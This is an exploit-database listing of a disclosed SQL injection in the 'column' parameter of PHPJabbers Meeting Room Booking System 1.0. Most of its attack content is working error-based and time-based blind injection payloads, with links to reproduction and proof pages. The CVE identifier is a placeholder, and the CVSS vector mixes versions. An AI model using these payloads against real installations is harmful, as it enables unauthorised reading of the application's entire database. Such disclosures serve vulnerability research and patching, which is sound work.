Advertisement






Meeting Room Booking System 1.0 SQL Injection

CVE Category Price Severity
CVE-2019-XXXX CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-09-10
CVSS
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023090034

Below is a copy:

Meeting Room Booking System 1.0 SQL Injection
## Title: Meeting Room Booking System-1.0 Multiple - SQLi
## Author: nu11secur1ty
## Date: 09/06/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The column parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the column parameter, and a
database error message was returned. The attacker easily can steal all
information from the database of this web application!
WARNING! All of you: Be careful what you buy! This will be your responsibility!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: column (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(SELECT
6118 FROM(SELECT COUNT(*),CONCAT(0x716a717171,(SELECT
(ELT(6118=6118,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&direction=ASC&page=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(CASE
WHEN (6735=6735) THEN SLEEP(5) ELSE 6735 END)&direction=ASC&page=1
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Meeting-Room-Booking-System-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/meeting-room-booking-system-10-multiple.html)

## Time spent:
01:47:00


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.